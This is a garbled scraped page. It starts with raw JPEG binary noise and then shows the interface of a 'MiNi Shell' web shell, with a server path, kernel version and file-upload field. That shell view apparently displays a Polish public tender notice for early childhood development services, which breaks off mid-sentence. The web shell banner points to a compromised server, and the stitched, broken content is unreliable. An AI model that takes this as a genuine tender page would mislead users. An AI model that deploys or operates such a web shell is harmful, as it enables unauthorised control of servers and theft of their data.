JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20240407/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20240407/0027445101-N-2024.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> Świadczenie usług związanych z organizacją i prowadzeniem zajęć wczesnego wspomagania rozwoju w ramach rządowego programu kompleksowego wsparcia dla rodzin „Za życiem” </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Poradnia Psychologiczno-Pedagogiczna</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 001045832</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Majowa 1/13</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Tomaszów Mazowiecki</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">97-200</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">łódzkie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL713 - Piotrkowski</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">sekretariat@ppptm.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">https://ppptm.pl/</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - inny zamawiający</span> </h3> <p class="mb-0"> Poradnia Psychologiczno-Pedagogiczna pełniąca funkcję WOKRO </p> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Edukacja</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Świadczenie usług związanych z organizacją i prowadzeniem zajęć wczesnego wspomagania rozwoju w ramach rządowego programu kompleksowego wsparcia dla rodzin „Za życiem” </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-53cf3911-f512-11ee-ac52-ee29f86ffd4f</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2024/BZP 00274451</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2024-04-07</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.13.) O zamówienie mogą ubiegać się wyłącznie wykonawcy, którzy spełniają warunki określone w art. 361 ustawy – usługi społeczne: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://ezamowienia.gov.pl/mp-client/search/list/ocds-148610-53cf3911-f512-11ee-ac52-ee29f86ffd4f <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://ezamowienia.gov.pl</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1. W postępowaniu o udzielenie zamówienia publicznego komunikacja między Zamawiającym, a Wykonawcami odbywa się przy użyciu Platformy e-Zamówienia, która jest dostępna pod adresem https://ezamowienia.gov.pl<br/>2. Korzystanie z Platformy e-Zamówienia jest bezpłatne.<br/>4. Wykonawca zamierzający wziąć udział w postępowaniu o udzielenie zamówienia publicznego musi posiadać konto podmiotu „Wykonawca” na Platformie e-Zamówienia. Szczegółowe informacje na temat zakładania kont podmiotów oraz zasady i warunki korzystania z Platformy e-Zamówienia określa Regulamin Platformy e-Zamówienia, dostępny na stronie internetowej https://ezamowienia.gov.pl/pl/regulamin/#regulamin-serwisu oraz informacje zamieszczone w zakładce „Centrum Pomocy”.<br/>5. Przeglądanie i pobieranie publicznej treści dokumentacji postępowania nie wymaga posiadania konta na Platformie e-Zamówienia ani logowania do Platformy e-Zamówienia.<br/>Sposób sporządzenia dokumentów elektronicznych lub dokumentów elektronicznych będących kopią elektroniczną treści zapisanej w postaci papierowej (cyfrowe odwzorowania) musi być zgodny z wymaganiami określonymi w rozporządzeniu Prezesa Rady Ministrów z dnia 30 grudnia 2020 r. w sprawie sposobu sporządzania i przekazywania informacji oraz wymagań technicznych dla dokumentów elektronicznych oraz środków komunikacji elektronicznej w postępowaniu o udzielenie zamówienia publicznego lub konkursie.<br/>6. Dokumenty elektroniczne, o których mowa w § 2 ust. 1 rozporządzenia , o którym mowa w pkt 11.6 SWZ, sporządza się w postaci elektronicznej, w formatach danych określonych w przepisach rozporządzenia Rady Ministrów z dnia 12 kwietnia 2012 r. w sprawie Krajowych Ram Interoperacyjności, minimalnych wymagań dla rejestrów publicznych i wymiany informacji w postaci elektronicznej oraz minimalnych wymagań dla systemów teleinformatycznych, z uwzględnieniem rodzaju przekazywanych danych i przekazuje się jako załączniki. W przypadku formatów, o których mowa w art. 66 ust. 1 ustawy Pzp, ww. regulacje nie będą miały bezpośredniego zastosowania.<br/>7. Informacje, oświadczenia lub dokumenty, inne niż wymienione w § 2 ust. 1 rozporządzenia, o którym mowa w pkt 11.6 SWZ, przekazywane w postępowaniu sporządza się w postaci elektronicznej:<br/>a) w formatach danych określonych w przepisach rozporządzenia Rady Ministrów w sprawie Krajowych Ram Interoperacyjności z uwzględnieniem rodzaju przekazywanych danych (i przekazuje się jako załącznik), lub<br/>b) jako tekst wpisany bezpośrednio do wiadomości przekazywanej przy użyciu środków komunikacji elektronicznej (np. w treści wiadomości e-mail lub w treści „Formularza do komunikacji”).<br/>8. Jeżeli dokumenty elektroniczne, przekazywane przy użyciu środków komunikacji elektronicznej, zawierają informacje stanowiące tajemnicę przedsiębiorstwa w rozumieniu przepisów ustawy z dnia 16 kwietnia 1993 r. o zwalczaniu nieuczciwej konkurencji (Dz. U. z 2022 r. poz. 1233 ze zm.), wykonawca, w celu utrzymania w poufności tych informacji, przekazuje je w wydzielonym i odpowiednio oznaczonym pliku, wraz z jednoczesnym zaznaczeniem w nazwie pliku „Dokument stanowiący tajemnicę przedsiębiorstwa”.<br/>9. Komunikacja w postępowaniu, z wyłączeniem składania ofert (sposób składania ofert opisano w rozdziale XXII SWZ) odbywa się drogą elektroniczną za pośrednictwem formularzy do komunikacji dostępnych w zakładce „Formularze” („Formularze do komunikacji”). Za pośrednictwem „Formularzy do komunikacji” odbywa się w szczególności przekazywanie wezwań i zawiadomień,<br/>zadawanie pytań i udzielanie odpowiedzi. Formularze do komunikacji umożliwiają również dołączenie załącznika do przesyłanej wiadomości (przycisk „dodaj załącznik”).<br/>Szczegółowe informacje zawarto w Rozdziale XIX SWZ.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Informacje zawarte w SWZ</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">Informacje zawarte w SWZ</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">PP-P.270.1.2.2024</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">7</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na wszystkie części</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> CZĘŚĆ III – Świadczenie usług związanych z prowadzeniem zajęć wczesnego wspomagania rozwoju dziecka przez Logopedę<br/>Do zadań logopedy należeć będzie:<br/>a.	po powołaniu w skład zespołu Specjalistów na podstawie stwierdzonej niepełnosprawności dziecka, ustalenie kierunków i harmonogramu działań podejmowanych <br/>w zakresie wczesnego wspomagania i wsparcia rodziny. Spotkania będą odbywały się na terenie Publicznej Poradni Psychologiczno-Pedagogicznej, ul. Majowa 1/13, 97-200 Tomaszów Mazowiecki co najmniej dwa razy w roku po uzgodnieniu terminu <br/>z koordynatorem programu. Zespół będzie powoływał koordynator WOKRO i koordynator merytoryczny programu,<br/>b.	nawiązanie współpracy z placówką, w której dziecko jest objęte innymi działaniami terapeutycznymi w celu zapewnienia spójności oddziaływań, w celu wspomagania rozwoju <br/>w części przeznaczonej dla logopedy,<br/>c.	opracowanie i realizowanie z dzieckiem i jego rodziną indywidualnego programu wczesnego wspomagania rozwoju w części przeznaczonej dla logopedy,<br/>d.	ocenianie postępów oraz trudności w funkcjonowaniu dziecka, w tym identyfikowanie <br/>i eliminowanie barier i ograniczeń w środowisku utrudniających jego aktywność <br/>i uczestnictwo w życiu społecznym (ewaluacja częściowa i końcowa),<br/>e.	analizowanie skuteczności pomocy udzielanej na podstawie programu dziecku i jego rodzinie,<br/>f.	wprowadzanie zmian w programie stosownie do aktualnych potrzeb dziecka i jego rodziny,<br/>g.	planowanie dalszych działań w zakresie wczesnego wspomagania.<br/>h.	Ilość godzin w ramach CZĘŚCI III: w 2024 roku - max. 448 godzin (czterysta czterdzieści osiem godzin). </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">80340000-9 - Usługi edukacji specjalnej</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2024-12-30</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1. Zamawiający dokona oceny ofert, które nie zostały odrzucone, na podstawie następujących kryteriów oceny ofert dla wszystkich części:<br/>Kryteriami wyboru oferty najkorzystniejszej są:<br/>1) cena całkowita brutto dla danej części zamówienia – 60%<br/>2) doświadczenie w co najmniej 3-letniej pracy z dzieckiem z niepełnosprawnością – 20%<br/>3) kwalifikacje w zakresie wczesnego wspomagania rozwoju- 20%</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">organizacja, kwalifikacje zawodowe i doświadczenie osób wyznaczonych do realizacji zamówienia</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">2) doświadczenie w co najmniej 3-letniej pracy z dzieckiem z niepełnosprawnością</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">organizacja, kwalifikacje zawodowe i doświadczenie osób wyznaczonych do realizacji zamówienia</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">kwalifikacje w zakresie wczesnego wspomagania rozwoju</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> CZĘŚĆ VI – Świadczenie usług związanych z prowadzeniem zajęć wczesnego wspomagania rozwoju dziecka przez Logopedę<br/><br/>Do zadań logopedy należeć będzie:<br/>a.	po powołaniu w skład zespołu Specjalistów na podstawie stwierdzonej niepełnosprawności dziecka, ustalenie kierunków i harmonogramu działań podejmowanych <br/>w zakresie wczesnego wspomagania i wsparcia rodziny. Spotkania będą odbywały się na terenie Publicznej Poradni Psychologiczno-Pedagogicznej, ul. Majowa 1/13, 97-200 Tomaszów Mazowiecki co najmniej dwa razy w roku po uzgodnieniu terminu <br/>z koordynatorem programu. Zespół będzie powoływał koordynator WOKRO i koordynator merytoryczny programu,<br/>b.	nawiązanie współpracy z placówką, w której dziecko jest objęte innymi działaniami terapeutycznymi w celu zapewnienia spójności oddziaływań, w celu wspomagania rozwoju <br/>w części przeznaczonej dla logopedy,<br/>c.	opracowanie i realizowanie z dzieckiem i jego rodziną indywidualnego programu wczesnego wspomagania rozwoju w części przeznaczonej dla logopedy,<br/>d.	ocenianie postępów oraz trudności w funkcjonowaniu dziecka, w tym identyfikowanie <br/>i eliminowanie barier i ograniczeń w środowisku utrudniających jego aktywność <br/>i uczestnictwo w życiu społecznym (ewaluacja częściowa i końcowa),<br/>e.	analizowanie skuteczności pomocy udzielanej na podstawie programu dziecku i jego rodzinie,<br/>f.	wprowadzanie zmian w programie stosownie do aktualnych potrzeb dziecka i jego rodziny,<br/>g.	planowanie dalszych działań w zakresie wczesnego wspomagania.<br/>h.	Ilość godzin w ramach CZĘŚCI VI: w 2024 roku - max. 200 godzin (dwieście godzin). </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">80340000-9 - Usługi edukacji specjalnej</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2024-12-30</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1. Zamawiający dokona oceny ofert, które nie zostały odrzucone, na podstawie następujących kryteriów oceny ofert dla wszystkich części:<br/>Kryteriami wyboru oferty najkorzystniejszej są:<br/>1) cena całkowita brutto dla danej części zamówienia – 60%<br/>2) doświadczenie w co najmniej 3-letniej pracy z dzieckiem z niepełnosprawnością – 20%<br/>3) kwalifikacje w zakresie wczesnego wspomagania rozwoju- 20%</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">organizacja, kwalifikacje zawodowe i doświadczenie osób wyznaczonych do realizacji zamówienia</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">2) doświadczenie w co najmniej 3-letniej pracy z dzieckiem z niepełnosprawnością</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">organizacja, kwalifikacje zawodowe i doświadczenie osób wyznaczonych do realizacji zamówienia</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">kwalifikacje w zakresie wczesnego wspomagania rozwoju</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 3</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> CZĘŚĆ X – Świadczenie usług związanych z prowadzeniem zajęć wczesnego wspomagania rozwoju dziecka przez Pedagoga<br/><br/>Do zadań pedagoga należeć będzie:<br/>a.	po powołaniu w skład zespołu Specjalistów na podstawie stwierdzonej niepełnosprawności dziecka, ustalenie kierunków i harmonogramu działań podejmowanych <br/>w zakresie wczesnego wspomagania i wsparcia rodziny. Spotkania będą odbywały się na terenie Publicznej Poradni Psychologiczno-Pedagogicznej, ul. Majowa 1/13, 97-200 Tomaszów Mazowiecki co najmniej dwa razy w roku po uzgodnieniu terminu <br/>z koordynatorem programu. Zespół będzie powoływał koordynator WOKRO i koordynator merytoryczny programu,<br/>b.	nawiązanie współpracy z placówką, w której dziecko jest objęte innymi działaniami terapeutycznymi w celu zapewnienia spójności oddziaływań, w celu wspomagania rozwoju <br/>w części przeznaczonej dla pedagoga,<br/>c.	opracowanie i realizowanie z dzieckiem i jego rodziną indywidualnego programu wczesnego wspomagania rozwoju w części przeznaczonej dla pedagoga,<br/>d.	ocenianie postępów oraz trudności w funkcjonowaniu dziecka, w tym identyfikowanie <br/>i eliminowanie barier i ograniczeń w środowisku utrudniających jego aktywność <br/>i uczestnictwo w życiu społecznym (ewaluacja częściowa i końcowa),<br/>e.	analizowanie skuteczności pomocy udzielanej na podstawie programu dziecku i jego rodzinie,<br/>f.	wprowadzanie zmian w programie stosownie do aktualnych potrzeb dziecka i jego rodziny,<br/>g.	planowanie dalszych działań w zakresie wczesnego wspomagania.<br/>h.	Ilość godzin w ramach CZĘŚCI X: w 2024 roku - max. 305 godzin (trzysta pięć godzin). </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">80340000-9 - Usługi edukacji specjalnej</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2024-12-30</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1. Zamawiający dokona oceny ofert, które nie zostały odrzucone, na podstawie następujących kryteriów oceny ofert dla wszystkich części:<br/>Kryteriami wyboru oferty najkorzystniejszej są:<br/>1) cena całkowita brutto dla danej części zamówienia – 60%<br/>2) doświadczenie w co najmniej 3-letniej pracy z dzieckiem z niepełnosprawnością – 20%<br/>3) kwalifikacje w zakresie wczesnego wspomagania rozwoju- 20%</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">organizacja, kwalifikacje zawodowe i doświadczenie osób wyznaczonych do realizacji zamówienia</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">2) doświadczenie w co najmniej 3-letniej pracy z dzieckiem z niepełnosprawnością</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">organizacja, kwalifikacje zawodowe i doświadczenie osób wyznaczonych do realizacji zamówienia</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">kwalifikacje w zakresie wczesnego wspomagania rozwoju</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 4</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> CZĘŚĆ XI – Świadczenie usług związanych z prowadzeniem 